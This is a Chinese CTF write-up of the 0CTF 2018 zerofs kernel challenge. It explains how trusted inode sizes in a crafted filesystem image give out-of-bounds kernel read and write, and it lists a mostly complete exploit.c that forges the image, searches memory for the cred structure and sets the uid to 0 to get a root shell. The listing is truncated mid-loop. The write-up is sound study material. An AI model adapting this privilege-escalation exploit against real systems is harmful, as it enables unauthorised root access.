haivk
haivk

linux kernel pwn学习之溢出,0ctf2018-zerofs任意读写到提权

0ctf2018-zerofs

首先,我们用IDA分析一下驱动文件zerofs.ko,发现该驱动注册了一个文件系统,实现了一个自己的文件系统。

linux kernel pwn学习之溢出,0ctf2018-zerofs任意读写到提权_第1张图片

题目改编自simplefs,https://github.com/psankar/simplefs,一个简易的文件系统,可以实现文件的存储。而本题,在上面的基础上做了精简修改。并且留有几个漏洞。一个文件系统的镜像,需要mount到目录上,才能使用。而mount是如何来识别这些文件系统的呢,这就靠驱动,register_filesystem将用户定义的文件系统注册,链接到系统维护的一个文件系统表上,mount遍历这张表,丛中取出对应的文件系统,并使用驱动里提供的一系列文件操作。

linux kernel pwn学习之溢出,0ctf2018-zerofs任意读写到提权_第2张图片

我们看到,驱动里有一系列操作,而我们mount这种文件系统的镜像时,这里面对应的mount函数就会被调用。

linux kernel pwn学习之溢出,0ctf2018-zerofs任意读写到提权_第3张图片

传入了zerofs_fill_super函数的地址,zerofs_fill_super函数将会被调用,我们看看zerofs_fill_super函数

在linux下,文件系统的结构如下

  1. superblock:记录着文件系统的整体信息,包括inode/block的总量、使用量、剩余量, 以及档案系统的格式与相关信息等;
  2. inode:记录档案的属性,一个档案占用一个inode,同时记录此档案的资料所在的block 号码;
  3. block:实际记录档案的内容,若档案太大时,会占用多个block

引文来自https://blog.csdn.net/Ohmyberry/article/details/80427492

那么,这个驱动的zerofs_fill_super就是初始化superblock的操作,我们进去看看

linux kernel pwn学习之溢出,0ctf2018-zerofs任意读写到提权_第4张图片

我们对比一下源码,就可以理解了

  1. /* This function, as the name implies, Makes the super_block valid and 
  2.  * fills filesystem specific information in the super block */  
  3. int simplefs_fill_super(struct super_block *sb, void *data, int silent)  
  4. {  
  5.     struct inode *root_inode;  
  6.     struct buffer_head *bh;  
  7.     struct simplefs_super_block *sb_disk;  
  8.     int ret = -EPERM;  
  9.   
  10.     bh = sb_bread(sb, SIMPLEFS_SUPERBLOCK_BLOCK_NUMBER);  
  11.     BUG_ON(!bh);  
  12.   
  13.     sb_disk = (struct simplefs_super_block *)bh->b_data;  
  14.   
  15.     printk(KERN_INFO "The magic number obtained in disk is: [%llu]\n",  
  16.            sb_disk->magic);  
  17.   
  18.     if (unlikely(sb_disk->magic != SIMPLEFS_MAGIC)) {  
  19.         printk(KERN_ERR  
  20.                "The filesystem that you try to mount is not of type simplefs. Magicnumber mismatch.");  
  21.         goto release;  
  22.     }  
  23.   
  24.     if (unlikely(sb_disk->block_size != SIMPLEFS_DEFAULT_BLOCK_SIZE)) {  
  25.         printk(KERN_ERR  
  26.                "simplefs seem to be formatted using a non-standard block size.");  
  27.         goto release;  
  28.     }  
  29.     /** XXX: Avoid this hack, by adding one more sb wrapper, but non-disk */  
  30.     sb_disk->journal = NULL;  
  31.   
  32.     printk(KERN_INFO  
  33.            "simplefs filesystem of version [%llu] formatted with a block size of [%llu] detected in the device.\n",  
  34.            sb_disk->version, sb_disk->block_size);  
  35.   
  36.     /* A magic number that uniquely identifies our filesystem type */  
  37.     sb->s_magic = SIMPLEFS_MAGIC;  
  38.   
  39.     /* For all practical purposes, we will be using this s_fs_info as the super block */  
  40.     sb->s_fs_info = sb_disk;  
  41.   
  42.     sb->s_maxbytes = SIMPLEFS_DEFAULT_BLOCK_SIZE;  
  43.     sb->s_op = &simplefs_sops;  
  44.   
  45.     root_inode = new_inode(sb);  
  46.     root_inode->i_ino = SIMPLEFS_ROOTDIR_INODE_NUMBER;  
  47.     inode_init_owner(root_inode, NULL, S_IFDIR);  
  48.     root_inode->i_sb = sb;  
  49.     root_inode->i_op = &simplefs_inode_ops;  
  50.     root_inode->i_fop = &simplefs_dir_operations;  
  51.     root_inode->i_atime = root_inode->i_mtime = root_inode->i_ctime =  
  52.         current_time(root_inode);  
  53.   
  54.     root_inode->i_private =  
  55.         simplefs_get_inode(sb, SIMPLEFS_ROOTDIR_INODE_NUMBER);  
  56.   
  57.     /* TODO: move such stuff into separate header. */  
  58. #if LINUX_VERSION_CODE >= KERNEL_VERSION(3, 3, 0)  
  59.     sb->s_root = d_make_root(root_inode);  
  60. #else  
  61.     sb->s_root = d_alloc_root(root_inode);  
  62.     if (!sb->s_root)  
  63.         iput(root_inode);  
  64. #endif  
  65.   
  66.     if (!sb->s_root) {  
  67.         ret = -ENOMEM;  
  68.         goto release;  
  69.     }  
  70.   
  71.     if ((ret = simplefs_parse_options(sb, data)))  
  72.         goto release;  
  73.   
  74.     if (!sb_disk->journal) {  
  75.         struct inode *journal_inode;  
  76.         journal_inode = simplefs_iget(sb, SIMPLEFS_JOURNAL_INODE_NUMBER);  
  77.   
  78.         ret = simplefs_sb_load_journal(sb, journal_inode);  
  79.         goto release;  
  80.     }  
  81.     ret = jbd2_journal_load(sb_disk->journal);  
  82.   
  83. release:  
  84.     brelse(bh);  
  85.   
  86.     return ret;  
  87. }  

基本上是差不多的。

linux kernel pwn学习之溢出,0ctf2018-zerofs任意读写到提权_第5张图片

我们能推出,zerofs的super_block的结构如下

  1. /*super_block,大小0x1000*/  
  2. struct zerofs_super_block {  
  3.    uint64_t magic;  
  4.    uint64_t block_size;  
  5.    uint64_t inodes_count;  
  6.    char padding[ZEROFS_DEFAULT_BLOCK_SIZE-8*3];  
  7. };  

并且相关的数据需要满足条件,不然不能挂载成功。

我们来看看read函数

linux kernel pwn学习之溢出,0ctf2018-zerofs任意读写到提权_第6张图片

对比simplefs的源码,我们知道,这里做了范围的检查。然后我们来看这个参数是什么

我们来看看simplefs的源码

  1. ssize_t simplefs_read(struct file * filp, char __user * buf, size_t len,  
  2.               loff_t * ppos)  
  3. {  
  4.     /* After the commit dd37978c5 in the upstream linux kernel, 
  5.      * we can use just filp->f_inode instead of the 
  6.      * f->f_path.dentry->d_inode redirection */  
  7.     struct simplefs_inode *inode =  
  8.         SIMPLEFS_INODE(filp->f_path.dentry->d_inode);  
  9.     struct buffer_head *bh;  
  10.   
  11.     char *buffer;  
  12.     int nbytes;  
  13.   
  14.     if (*ppos >= inode->file_size) {  
  15.         /* Read request with offset beyond the filesize */  
  16.         return 0;  
  17.     }  
  18.   
  19.     bh = sb_bread(filp->f_path.dentry->d_inode->i_sb,  
  20.                         inode->data_block_number);  
  21.   
  22.     if (!bh) {  
  23.         printk(KERN_ERR "Reading the block number [%llu] failed.",  
  24.                inode->data_block_number);  
  25.         return 0;  
  26.     }  
  27.   
  28.     buffer = (char *)bh->b_data;  
  29.     nbytes = min((size_tinode->file_size, len);  
  30.   
  31.     if (copy_to_user(buf, buffer, nbytes)) {  
  32.         brelse(bh);  
  33.         printk(KERN_ERR  
  34.                "Error copying file contents to the userspace buffer\n");  
  35.         return -EFAULT;  
  36.     }  
  37.   
  38.     brelse(bh);  
  39.   
  40.     *ppos += nbytes;  
  41.   
  42.     return nbytes;  
  43. }  
  1. static inline struct simplefs_inode *SIMPLEFS_INODE(struct inode *inode)  
  2. {  
  3.     return inode->i_private;  
  4. }  

我们发现,inode是从get_inode函数来的

linux kernel pwn学习之溢出,0ctf2018-zerofs任意读写到提权_第7张图片

然后,我们看看get_inode函数,是从文件系统镜像里读取一个文件的inode,里面记录着文件的大小等属性

linux kernel pwn学习之溢出,0ctf2018-zerofs任意读写到提权_第8张图片

由于这些inode是从现有的文件系统镜像里读出来的,这意味着,我们可以伪造里面的文件的size

再回来看read函数,buffer = bh->b_data,也就是bread创建的一段在内存中大小有限的缓冲区,而如果文件的size我们事先伪造的很大,这意味着我们就能访问缓冲区外的数据,也就是能够溢出了。

linux kernel pwn学习之溢出,0ctf2018-zerofs任意读写到提权_第9张图片

然后,我们再看write函数,write函数缺少对边界的检查,可以越界写。

linux kernel pwn学习之溢出,0ctf2018-zerofs任意读写到提权_第10张图片

由此,我们只需要伪造一个size为无穷大的文件放到这个文件系统里,即可实现任意地址读写。我们直接参考simplefsmkfs-simplefs.c源码,来制作evil镜像即可。在实现了任意地址读写,我们只需在内存中搜索进程的cred结构,并把相关的uid、gid修改为0,即可提权。

为了增加提权的成功率,我们得让cred结构在内存中的位置处于bread缓冲区的下方,这样,我们向下任意读写的时候才能找到这个结构进而覆盖。因此,我们还fork了一个子进程,因为子进程后fork,由堆分配的规律,它的cred结构被分配到内存后面的可能性比较大。

我们完整的exploit.c程序

#include 
#include 
#include 
#include 
#include 
#include 
#include 

/*块大小*/
#define ZEROFS_DEFAULT_BLOCK_SIZE 0x1000
/*根目录的inode号*/
#define ZEROFS_ROOTDIR_INODE_NUMBER 1
#define ZEROFS_ROOTDIR_DATABLOCK_NUMBER 2

/*漏洞利用点文件的inode号*/
#define ZEROFS_EVIL_INODE_NUMBER 2
#define ZEROFS_EVIL_DATABLOCK_NUMBER 3


/*super_block,大小0x1000*/
struct zerofs_super_block {
   uint64_t magic;
   uint64_t block_size;
   uint64_t inodes_count;
   char padding[ZEROFS_DEFAULT_BLOCK_SIZE-8*3];
};
/*zerofs_inode*/
struct zerofs_inode {
   uint64_t inode_no;
   uint64_t data_block_number;
   mode_t mode;
   union {
      uint64_t file_size;
      uint64_t dir_children_count;
   };
};

/*文件名和序号*/
struct zerofs_dir_record {
   char filename[256];
   uint64_t inode_no;
};

/*写super_block*/
static int write_superblock(int fd) {
   struct zerofs_super_block sb = {
      .magic = 0x4F52455ALL,
      .block_size = 0x1000,
      .inodes_count = 3
   };
   int ret = write(fd,&sb, sizeof(sb));
   if (ret != ZEROFS_DEFAULT_BLOCK_SIZE) {
      printf("bytes written [%d] are not equal to the default block size\n",(int)ret);
      return -1;
   } else {
      printf("Super block written succesfully\n");
   }
   return 0;
}

/*写根目录节点*/
static int write_root_inode(int fd) {
   struct zerofs_inode root_inode;
   root_inode.inode_no = ZEROFS_ROOTDIR_INODE_NUMBER;
   root_inode.data_block_number = ZEROFS_ROOTDIR_DATABLOCK_NUMBER;
   root_inode.mode = S_IFDIR; //代表这是一个目录
   root_inode.dir_children_count = 1; //目录下有一个文件
   int ret = write(fd, &root_inode, sizeof(root_inode));
   if (ret != sizeof(root_inode)) {
      printf("The inode store was not written properly. Retry\n");
      return -1;
   }
   printf("root directory inode written succesfully\n");
   return 0;
}
/*这个文件,就是我们的漏洞利用点,我们创建一个size为-1的文件,即相当于无穷大*/
static int write_evil_inode(int fd) {
   struct zerofs_inode evil_inode;
   evil_inode.inode_no = ZEROFS_EVIL_INODE_NUMBER;
   evil_inode.data_block_number = ZEROFS_EVIL_DATABLOCK_NUMBER;
   evil_inode.mode = S_IFREG; //代表一个普通文件
   evil_inode.file_size = -1; //这里是重点!!
   int len = sizeof(evil_inode);
   int ret = write(fd,&evil_inode,len);
   if (ret != len) {
      printf("The evil inode was not written properly. Retry\n");
      return -1;
   }
   printf("evil inode written succesfully\n");
   return 0;
}

/*写文件名信息*/
int write_evil_dirent(int fd) {
   struct zerofs_dir_record evil_record;
   strcpy(evil_record.filename,"haivk"); //文件名为haivk
   evil_record.inode_no = ZEROFS_EVIL_INODE_NUMBER; //这个号对应我们前面的那个evil_inode的号
   int len = sizeof(struct zerofs_dir_record);
   int ret = write(fd,&evil_record,len);
   if (ret != len) {
      printf("The evil inode\'s dirent was not written properly. Retry\n");
      return -1;
   }
   printf("evil inode\'s dirent written succesfully\n");
   return 0;
}
/*写填充字节*/
int writePadding(int fd,int len) {
   //写填充字节
   char *padding = (char *)calloc(1,len);
   int ret = write(fd,padding,len);
   free(padding);
   if (ret != len) {
      printf("The padding was not written properly. Retry\n");
      return -1;
   }
   return 0;
}

int createEvilFs() {
   int fd = open("/tmp/zerofs.img",O_RDWR | O_CREAT);
   if (write_superblock(fd)) {
      return -1;
   }
   if (write_root_inode(fd)) {
      return -1;
   }
   if (write_evil_inode(fd)) {
      return -1;
   }
   if (writePadding(fd,ZEROFS_DEFAULT_BLOCK_SIZE-sizeof(struct zerofs_inode)*2)) {
      return -1;
   }
   if (write_evil_dirent(fd)) {
      return -1;
   }
   if (writePadding(fd,ZEROFS_DEFAULT_BLOCK_SIZE-sizeof(struct zerofs_dir_record))) {
      return -1;
   }
   //写文件内容
   char hello[0x100] = "hello,I am hacker haivk!\n";
   write(fd,hello,sizeof(hello));
   if (writePadding(fd,ZEROFS_DEFAULT_BLOCK_SIZE-sizeof(hello))) {
      return -1;
   }
   close(fd);
   return 0;
}

//是否root成功
int rooted = 0;

void myExit(int pfd,int fd,int code) {
   sleep(2);
   char buf[0x10] = {0};
   read(pfd,buf,0x10);
   //接收到子进程root成功的信号
   if (!strcmp(buf,"success")) {
      rooted = 1;
      wait(NULL);
   }
   close(fd);
   //卸载文件
   system("./umount");
   exit(code);
}

int main() {
   if (access("/tmp/zerofs.img",F_OK)) {
      //创建一个带有溢出的文件系统
      createEvilFs();
   }
   //挂载这个文件系统
   system("./mount");
   //打开这个文件系统里的那个有问题的文件
   int fd = open("/mnt/haivk",O_RDWR);
   if (fd == -1) {
      printf("文件打开失败!!\n");
      exit(-1);
   }
   //父进程与子进程通信
   int pfd[2];
   if (pipe(pfd) == -1) {
      puts("[*] pipe error!");
      exit(0);
   }
   //设置管道非阻塞模式
   fcntl(pfd[0], F_SETFL, O_NONBLOCK);
   fcntl(pfd[1], F_SETFL, O_NONBLOCK);

   int pid = fork();
   if (pid < 0) {
      puts("[*] fork error!");
      exit(0);
   } else if (pid == 0) {
      while (getuid() != 0) {
         sleep(1);
      }
      //通过管道,通知父进程root成功
      write(pfd[1],"success",0x10);
      //子进程root成功
      printf("[+]rooted in subprocess!!\n");
      system("/bin/sh");
   } else {
      int uid = getuid();
      size_t buf_len = 0x100000;
      //创建一个缓冲区
      unsigned int *buf = (unsigned int *)malloc(buf_len);
      int ret;
      //读取这个文件,直到读取到cred结构体为止
      for (int i=0;i<0x100 && !rooted;i++) {
         ret = lseek(fd,i * buf_len, SEEK_SET);
         if (ret < 0) {
            printf("seek memory error!!\n");
            myExit(pfd[0],fd,-1);
         }
         ret = read(fd,buf,buf_len);
         if (ret < 0) {
            printf("read memory error!!\n");
            myExit(pfd[0],fd,-1);
         }
         int found = 0;
         //搜索cred结构
         for (int j=0;j

linux kernel pwn学习之溢出,0ctf2018-zerofs任意读写到提权_第11张图片

一次提权失败的时候,可以多次尝试,大概一两次就能提权了。

你可能感兴趣的:(pwn,CTF,二进制漏洞,安全,PWN,CTF,二进制漏洞,缓冲区溢出)

  • 微服务下功能权限与数据权限的设计与实现 nbsaas-boot 微服务java架构
    在微服务架构下,系统的功能权限和数据权限控制显得尤为重要。随着系统规模的扩大和微服务数量的增加,如何保证不同用户和服务之间的访问权限准确、细粒度地控制,成为设计安全策略的关键。本文将讨论如何在微服务体系中设计和实现功能权限与数据权限控制。1.功能权限与数据权限的定义功能权限:指用户或系统角色对特定功能的访问权限。通常是某个用户角色能否执行某个操作,比如查看订单、创建订单、修改用户资料等。数据权限:
  • c++ 的iostream 和 c++的stdio的区别和联系 黄卷青灯77 c++算法开发语言iostreamstdio
    在C++中,iostream和C语言的stdio.h都是用于处理输入输出的库,但它们在设计、用法和功能上有许多不同。以下是两者的区别和联系:区别1.编程风格iostream(C++风格):C++标准库中的输入输出流类库,支持面向对象的输入输出操作。典型用法是cin(输入)和cout(输出),使用>操作符来处理数据。更加类型安全,支持用户自定义类型的输入输出。#includeintmain(){in
  • Long类型前后端数据不一致 igotyback 前端
    响应给前端的数据浏览器控制台中response中看到的Long类型的数据是正常的到前端数据不一致前后端数据类型不匹配是一个常见问题,尤其是当后端使用Java的Long类型(64位)与前端JavaScript的Number类型(最大安全整数为2^53-1,即16位)进行数据交互时,很容易出现精度丢失的问题。这是因为JavaScript中的Number类型无法安全地表示超过16位的整数。为了解决这个问
  • 特殊的拜年 飘雪的天堂
    文/雪儿大年初一,家家户户没有了轰响的鞭炮声,大街上没有了人流涌动的喧闹,几乎看不到人影,变得冷冷清清。天刚亮不大会儿,村里的大喇叭响了起来:由于当前正值疾病高发期,流感流行的高峰期。同时,新型冠状病毒感染的肺炎进入第二波流行的上升期。为了自己和他人的健康安全着想,请大家尽量不要串门拜年,不要在街里走动。可以通过手机微信,视频,电话,信息拜年……今年的春节真是特别。禁止燃放鞭炮,烟花爆竹,禁止出村
  • 【华为OD技术面试真题 - 技术面】-测试八股文真题题库(1) 算法大师 华为od面试python算法前端
    华为OD面试真题精选专栏:华为OD面试真题精选目录:2024华为OD面试手撕代码真题目录以及八股文真题目录文章目录华为OD面试真题精选1.黑盒测试和白盒测试的区别2.假设我们公司现在开发一个类似于微信的软件1.0版本,现在要你测试这个功能:打开聊天窗口,输入文本,限制字数在200字以内。问你怎么提取测试点。功能测试性能测试安全性测试可用性测试跨平台兼容性测试网络环境测试3.接口测试的工具你了解哪些
  • ARM驱动学习之4小结 JT灬新一 嵌入式C++arm开发学习linux
    ARM驱动学习之4小结#include#include#include#include#include#defineDEVICE_NAME"hello_ctl123"MODULE_LICENSE("DualBSD/GPL");MODULE_AUTHOR("TOPEET");staticlonghello_ioctl(structfile*file,unsignedintcmd,unsignedlo
  • 直返的东西正品吗?直返APP安全吗?直返是正规平台吗? 氧惠购物达人
    亲们,你们是不是经常在直返APP上买东西呀?但是,你们有没有想过,里面的东西到底是不是正品呢?这个APP安全吗?它是不是一个正规的平台呀?别着急,今天我就来给大家揭秘一下!氧惠APP(带货领导者)——是与以往完全不同的抖客+淘客app!2023全新模式,我的直推也会放到你下面。主打:带货高补贴,深受各位带货团队长喜爱(每天出单带货几十万单)。注册即可享受高补贴+0撸+捡漏等带货新体验。送万元推广大
  • EIO国际确定性的交易(3/10)资管 , 资金委托安全吗? 古城鹏哥
    大家可能都知道资金托管,账户是自己开,钱在自己的账户上,密码是由自己掌控,别人提不走你账户的资金,每天可以看下到自己的账户,也可以看到交易流水。现金只能提到自己的银行卡中。账户由技术人员或操作人员,或者是机构团队帮你操作账户,产生盈利和收入,以获得的利润来分配盈利,技术强硬和做的时间久了过硬技术团队,会保证你的资金本金,不会让你的本金亏损的按照一定比例分配收入。所以在这个过程当中一定要看清楚技术的
  • TDengine 签约前晨汽车,解锁智能出行的无限潜力 涛思数据(TDengine) tdengine汽车大数据
    在全球汽车产业转型升级的背景下,智能网联和新能源技术正迅速成为商用车行业的重要发展方向。随着市场对环保和智能化需求的日益增强,企业必须在技术创新和数据管理上不断突破,以满足客户对高效、安全和智能出行的期待。在这一背景下,前晨汽车凭借其在新能源智能商用车领域的前瞻性布局和技术实力,成为行业中的佼佼者。前晨汽车采用整车数据采集和全车数据打通策略,能够实时将数据推送至APP端客户。然而,这导致整体写入和
  • “这才好”麻辣香锅 能够增加人身体的免疫能力 小补文知
    我就来介绍一种香锅,那就是“这才好”麻辣香锅,它产出于著名的蜀地文化,具有悠久的历史土家风味,麻辣鲜香,健康安全。采用传统秘制麻辣香锅油辣子,还有贴心加料“孜然包”满足人们的不同口味需求,香锅底料辣椒,微辣且香,含有丰富微量元素和维生素,具有辣而不躁,味道纯正,醇厚温和。花椒采用历史悠久,被列为宫廷供品的“贡椒”的汉源花椒。我们还挑选了“川菜之魂”郫县豆瓣的鼻祖品牌豆瓣,保留最原始的郫县豆瓣味道,
  • Java面试题精选:消息队列(二) 芒果不是芒 Java面试题精选javakafka
    一、Kafka的特性1.消息持久化:消息存储在磁盘,所以消息不会丢失2.高吞吐量:可以轻松实现单机百万级别的并发3.扩展性:扩展性强,还是动态扩展4.多客户端支持:支持多种语言(Java、C、C++、GO、)5.KafkaStreams(一个天生的流处理):在双十一或者销售大屏就会用到这种流处理。使用KafkaStreams可以快速的把销售额统计出来6.安全机制:Kafka进行生产或者消费的时候会
  • Kafka是如何保证数据的安全性、可靠性和分区的 喜欢猪猪 kafka分布式
    Kafka作为一个高性能、可扩展的分布式流处理平台,通过多种机制来确保数据的安全性、可靠性和分区的有效管理。以下是关于Kafka如何保证数据安全性、可靠性和分区的详细解析:一、数据安全性SSL/TLS加密:Kafka支持SSL/TLS协议,通过配置SSL证书和密钥来加密数据传输,确保数据在传输过程中不会被窃取或篡改。这一机制有效防止了中间人攻击,保护了数据的安全性。SASL认证:Kafka支持多种
  • 2022-10-10 幸福芳芳
    10.10日觉察日记1.事件:开晨会员工来不齐,路远的请假,离得近的也请假,一律不批!2.感受:生气,气愤(情绪如何转化或使用)3.想法:1.今年已经很少开晨会了,非必要不会通知开会的,临近点了再打电话请假,又不是特别忙的季节,借口都会找~~2.不来的按公司标准执行负激励,待岗处理!我为你们负责,你们安全重要会议都不参加,自己都不为自己负责!以后有事也别找我!尤其是经销商老板,自己都不清楚自己用工
  • MongoDB知识概括 GeorgeLin98 持久层mongodb
    MongoDB知识概括MongoDB相关概念单机部署基本常用命令索引-IndexSpirngDataMongoDB集成副本集分片集群安全认证MongoDB相关概念业务应用场景:传统的关系型数据库(如MySQL),在数据操作的“三高”需求以及应对Web2.0的网站需求面前,显得力不从心。解释:“三高”需求:①Highperformance-对数据库高并发读写的需求。②HugeStorage-对海量数
  • 计算机木马详细编写思路 小熊同学哦 php开发语言木马木马思路
    导语:计算机木马(ComputerTrojan)是一种恶意软件,通过欺骗用户从而获取系统控制权限,给黑客打开系统后门的一种手段。虽然木马的存在给用户和系统带来严重的安全风险,但是了解它的工作原理与编写思路,对于我们提高防范意识、构建更健壮的网络安全体系具有重要意义。本篇博客将深入剖析计算机木马的详细编写思路,以及如何复杂化挑战,以期提高读者对计算机木马的认识和对抗能力。计算机木马的基本原理计算机木
  • react-intl——react国际化使用方案 苹果酱0567 面试题汇总与解析java开发语言中间件springboot后端
    国际化介绍i18n:internationalization国家化简称,首字母+首尾字母间隔的字母个数+尾字母,类似的还有k8s(Kubernetes)React-intl是React中最受欢迎的库。使用步骤安装#usenpmnpminstallreact-intl-D#useyarn项目入口文件配置//index.tsximportReactfrom"react";importReactDOMf
  • 基于STM32的汽车仪表显示系统:集成CAN、UART与I2C总线设计流程 极客小张 stm32汽车嵌入式硬件物联网单片机c语言
    一、项目概述项目目标与用途本项目旨在设计和实现一个基于STM32微控制器的汽车仪表显示系统。该系统能够实时显示汽车的速度、转速、油量等关键信息,并通过CAN总线与其他汽车控制单元进行通信。这种仪表显示系统不仅提高了驾驶的安全性和便捷性,还能为汽车提供更智能的用户体验。技术栈关键词微控制器:STM32显示技术:TFTLCD/OLED传感器:速度传感器、温度传感器、油量传感器通信协议:CAN总线、UA
  • 3286、穿越网格图的安全路径 Lenyiin 题解c++算法leetcode
    3286、[中等]穿越网格图的安全路径1、题目描述给你一个mxn的二进制矩形grid和一个整数health表示你的健康值。你开始于矩形的左上角(0,0),你的目标是矩形的右下角(m-1,n-1)。你可以在矩形中往上下左右相邻格子移动,但前提是你的健康值始终是正数。对于格子(i,j),如果grid[i][j]=1,那么这个格子视为不安全的,会使你的健康值减少1。如果你可以到达最终的格子,请你返回tr
  • 不安全依恋 徐猛_Merlin
    11.2不安全依恋在关系中自由的心里是不受她人情绪所影响和去发展新的关系两种。而不安全的依恋是对自己的关系存在恐惧的因素,也就是对周边的环境很陌生,而当在这个环境中存在一个熟悉的声音就是一种安全的依恋。这种依恋可能是一个熟悉的表情或者熟悉的面庞等等。
  • 【Python搞定车载自动化测试】——Python实现车载以太网DoIP刷写(含Python源码) 疯狂的机器人 Python搞定车载自动化pythonDoIPUDSISO142291SO13400Bootloadertcp/ip
    系列文章目录【Python搞定车载自动化测试】系列文章目录汇总文章目录系列文章目录前言一、环境搭建1.软件环境2.硬件环境二、目录结构三、源码展示1.DoIP诊断基础函数方法2.DoIP诊断业务函数方法3.27服务安全解锁4.DoIP自动化刷写四、测试日志1.测试日志五、完整源码链接前言随着智能电动汽车行业的发展,汽车=智能终端+四个轮子,各家车企都推出了各自的OTA升级方案,本章节主要介绍如何使
  • 4 大低成本娱乐方式: 小说, 音乐, 视频, 电子游戏 穷人小水滴 娱乐音视频低成本小说游戏
    穷人如何获得快乐?小说,音乐,视频,游戏,本文简单盘点一下这4大低成本(安全)娱乐方式.这里是穷人小水滴,专注于穷人友好型低成本技术.(本文为58号作品.)目录1娱乐方式1.1小说(网络小说)1.2音乐1.3视频(b站)1.4游戏(电子游戏/计算机软件)2低成本:一只手机即可3总结与展望1娱乐方式这几种,也可以说是艺术的具体形式.更专业的说,(娱乐)是劳动力再生产的重要组成部分.使人放松,获得快乐
  • 今天是总结 薛帅
    今天来个最后一天的总结。为什么要学习写作技巧呢?就如同建房子,如果想要住的安全、舒服,我们要先打地基,建房子的框架,这样才能随意的装修。那么我们要怎么建好才能建好写作的地基呢?1走直路,少弯路01利他:能够给别人带来价值。02吸引:吸住读者的眼球。03打动:打动人心,引起共鸣。04说服:用数据说话。05刻意:通过有意识的训练。06修改:好的文章至上修改10遍。07模仿:10万+的文章必有成功的道理
  • 拼多多返现要输入身份证号码安全吗?拼单返现是什么? 优惠券高省
    当我们谈到拼多多返现金活动时,很多朋友会担心提供身份证信息的安全性以及返现金额的真实性。今天,我就来为大家揭开这些疑虑的面纱,为大家提供一个清晰的答案。【高省】APP(高佣金领导者)是一个自用省钱佣金高,分享推广赚钱多的平台,百度有几百万篇报道,运行三年,稳定可靠。高省APP,是2021年推出的平台,0投资,0风险、高省APP佣金更高,模式更好,终端用户不流失。高省是公认的返利最高的软件。古楼导师
  • 《驴友的朝圣》065 户外运动论坛,论户外运动之现在与未来 经典老表
    十几年来,我国户外运动蓬勃发展,已经形成全民参与热情。各类户外运动项目和形式层出不穷。各种户外运动装备产品花样百出。看着形势一派大好。但是,在这大好形势之下,仍存在着诸多的发展瓶颈及安全与管理问题,需要提请重视。为此,江城登山协会在本地召开了“户外运动论坛”,邀请市内户外运动俱乐部及体育系统领导一起研讨本地区户外运动发展的可持续性。2019年6月1日,论坛在世贸万锦大酒店的支持下,在其三层会议大厅
  • 华为云分布式缓存服务DCS 8月新特性发布 华为云PaaS服务小智 华为云分布式缓存
    分布式缓存服务(DistributedCacheService,简称DCS)是华为云提供的一款兼容Redis的高速内存数据处理引擎,为您提供即开即用、安全可靠、弹性扩容、便捷管理的在线分布式缓存能力,满足用户高并发及数据快速访问的业务诉求。此次为大家带来DCS8月的特性更新内容,一起来看看吧!
  • c++ 内存处理函数 heeheeai c++开发语言
    在C语言的头文件中,memcpy和memmove函数都用于复制内存块,但它们在处理内存重叠方面存在关键区别:内存重叠:memcpy函数不保证在源内存和目标内存区域重叠时能够正确复制数据。如果内存区域重叠,memcpy的行为是未定义的,可能会导致数据损坏或程序崩溃。memmove函数能够安全地处理源内存和目标内存区域重叠的情况。它会确保在复制过程中不会覆盖尚未复制的数据,从而保证数据的完整性。效率:
  • Linux CTF逆向入门 蚁景网络安全 linux运维CTF
    1.ELF格式我们先来看看ELF文件头,如果想详细了解,可以查看ELF的manpage文档。关于ELF更详细的说明:e_shoff:节头表的文件偏移量(字节)。如果文件没有节头表,则此成员值为零。sh_offset:表示了该section(节)离开文件头部位置的距离+-------------------+|ELFheader|---++--------->+-------------------
  • 每日OJ_牛客_马戏团(模拟最长上升子序列) GR鲸鱼 c++算法开发语言牛客数据结构
    目录牛客_马戏团(模拟最长上升子序列)解析代码牛客_马戏团(模拟最长上升子序列)马戏团__牛客网搜狐员工小王最近利用假期在外地旅游,在某个小镇碰到一个马戏团表演,精彩的表演结束后发现团长正和大伙在帐篷前激烈讨论,小王打听了下了解到,马戏团正打算出一个新节目“最高罗汉塔”,即马戏团员叠罗汉表演。考虑到安全因素,要求叠罗汉过程中,站在某个人肩上的人应该既比自己矮又比自己瘦,或相等。团长想要本次节目中的
  • 信息系统安全相关概念(上) YuanDaima2048 课程笔记基础概念安全信息安全笔记
    文章总览:YuanDaiMa2048博客文章总览下篇:信息系统安全相关概念(下)信息系统安全相关概念[上]信息系统概述信息系统信息系统架构信息系统发展趋势:信息系统日趋大型化、复杂化信息系统面临的安全威胁信息系统安全架构设计--以云计算为例信息系统安全需求及安全策略自主访问控制策略DAC强制访问控制策略MAC信息系统概述信息系统用于收集、存储和处理数据以及传递信息、知识和数字产品的一组集成组件。几
  • 【加密算法基础——RSA 加密】 XWWW668899 网络服务器笔记python
    RSA加密RSA(Rivest-Shamir-Adleman)加密是非对称加密,一种广泛使用的公钥加密算法,主要用于安全数据传输。公钥用于加密,私钥用于解密。RSA加密算法的名称来源于其三位发明者的姓氏:R:RonRivestS:AdiShamirA:LeonardAdleman这三位计算机科学家在1977年共同提出了这一算法,并发表了相关论文。他们的工作为公钥加密的基础奠定了重要基础,使得安全通
  • xml解析 小猪猪08 xml
    1、DOM解析的步奏 准备工作:    1.创建DocumentBuilderFactory的对象    2.创建DocumentBuilder对象    3.通过DocumentBuilder对象的parse(String fileName)方法解析xml文件    4.通过Document的getElem
  • 每个开发人员都需要了解的一个SQL技巧 brotherlamp linuxlinux视频linux教程linux自学linux资料
      对于数据过滤而言CHECK约束已经算是相当不错了。然而它仍存在一些缺陷,比如说它们是应用到表上面的,但有的时候你可能希望指定一条约束,而它只在特定条件下才生效。 使用SQL标准的WITH CHECK OPTION子句就能完成这点,至少Oracle和SQL Server都实现了这个功能。下面是实现方式: CREATE TABLE books (   id &
  • Quartz——CronTrigger触发器 eksliang quartzCronTrigger
    转载请出自出处:http://eksliang.iteye.com/blog/2208295 一.概述 CronTrigger 能够提供比 SimpleTrigger 更有具体实际意义的调度方案,调度规则基于 Cron 表达式,CronTrigger 支持日历相关的重复时间间隔(比如每月第一个周一执行),而不是简单的周期时间间隔。 二.Cron表达式介绍 1)Cron表达式规则表 Quartz
  • Informatica基础 18289753290 InformaticaMonitormanagerworkflowDesigner
    1. 1)PowerCenter Designer:设计开发环境,定义源及目标数据结构;设计转换规则,生成ETL映射。 2)Workflow  Manager:合理地实现复杂的ETL工作流,基于时间,事件的作业调度 3)Workflow  Monitor:监控Workflow和Session运行情况,生成日志和报告 4)Repository  Manager:
  • linux下为程序创建启动和关闭的的sh文件,scrapyd为例 酷的飞上天空 scrapy
